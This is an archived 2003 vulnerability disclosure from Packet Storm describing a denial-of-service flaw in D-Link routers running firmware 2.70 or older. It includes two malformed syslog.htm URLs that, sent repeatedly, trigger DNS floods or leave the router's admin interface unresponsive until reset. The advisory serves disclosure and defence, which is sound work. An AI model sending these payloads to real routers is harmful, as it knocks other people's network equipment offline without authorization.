exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

dlinkDoS.txt

dlinkDoS.txt
Posted Jun 3, 2003
Authored by Chris | Site securityindex.net

D-Link routers with a firmware of 2.70 and below are vulnerable to a denial of service vulnerability providing the attacker has the ability to see the internal interface on the router. Sending a malformed URL to the syslog script will caused a DNS query. Multitudes of this query can result in a DoS and other odd forms of behavior.

tags | exploit, denial of service
SHA-256 | 802c81b31a6ec34d42defd9d16029f1790493faf92d67f06228dcf953950b333

dlinkDoS.txt

Change Mirror Download

Nessus wrote a nice little plugin for it
http://www.securityindex.net/dlink_router_overflow.nasl
--
My home network uses a small 4 port broadband Dlink router (704p) The firmware was updated one week ago
to version 2.70 from the www.D-link.com website

The following malformed URL's cause odd behavior in the router. Pointing your browser (like most routers) to the gateways internal IP address you get a web interface for administering your router.

http://192.168.0.1/syslog.htm?D=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

This URL caused the router to do a DNS query on:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@xxxx.xx.comcast.net

"@xxxx.xx.comcast.net" is the trailing end of my hostname (i replaced the real trailing host name with x's as to not give up my hometown and state! heh)


Subsequently there was a DNS response "no such name"
Enough of these malformed URLS causes the DNS server to DoS the router for a short time because a DNS response packet is much larger then a DNS query packet.
This URL also caused an error in the routers log file page, the URL
made the page look odd. This router uses CSS to display its tabs and log file (syslog.htm). Some of the HTML was visible within the CSS that were now repeating across the page. I took a screen shot and uploaded it to my webspace. Copy and paste the link below to see.

http://www.securityindex.net/router.JPG

<------------------------------------------- ------------------------------------------->
<------------------------------------------- ------------------------------------------->
<------------------------------------------- ------------------------------------------->
<------------------------------------------- ------------------------------------------->
<-------------------------------------------next------------------------------------------->


This URL also cuases problems:

http://192.168.0.1/syslog.htm?D=................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

This malformed URL caused the router to stop responding. Requesting this
url over and over will eventually render the router useless until reset.
You can still access the internet after sending this url once but the routers
configuration page does not respond until you reset the router.

If your D-Link router is set to allow remote administration then its potentially
possible for an attacker to render your router useless until it is physically
reset by unplugging it and replugging it into the wall.

-->
i sent an email to dlink containing a copy of this post. Thanx
-->

--chris

www.securityindex.net

-apex security group-

:-hello-:
george
dreifach-x
th1nk
johnblaze

Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    14 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close